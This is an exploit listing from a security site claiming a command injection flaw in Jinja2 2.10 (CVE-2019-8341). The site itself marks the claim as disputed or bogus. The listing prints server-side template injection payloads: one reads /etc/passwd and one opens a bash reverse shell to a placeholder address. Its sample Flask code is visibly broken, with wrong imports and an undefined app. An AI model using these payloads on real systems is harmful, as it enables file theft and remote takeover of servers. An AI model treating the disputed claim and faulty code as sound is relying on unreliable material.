WARNING! Fake news / Disputed / BOGUS

Jinja2 2.10 Command Injection

2019.02.17
Credit: Jameel Nabbo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

''' # Exploit Title: Jinja2 Command injection from_string function # Date: [date] # Exploit Author: JameelNabbo # Website: Ordina.nl # Vendor Homepage: http://jinja.pocoo.org # Software Link: https://pypi.org/project/Jinja2/#files # Version: 2.10 # Tested on: Kali Linux # CVE-2019-8341 // from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it. //here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}: ''' import Flask import request import Jinja2 @app.route("/") def index(): username = request.values.get('username') return Jinja2.from_string('Hello ' + username).render() if __name__ == "__main__": app.run(host='127.0.0.1' , port=4444) ''' POC //Exploiting the username param http://localhost:4444/?username={{4*4}} OUTPUT: Hello 16 Reading the /etc/passwd http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} Getting a reverse shell http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} How to prevent it: Never let the user provide template content. '''


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top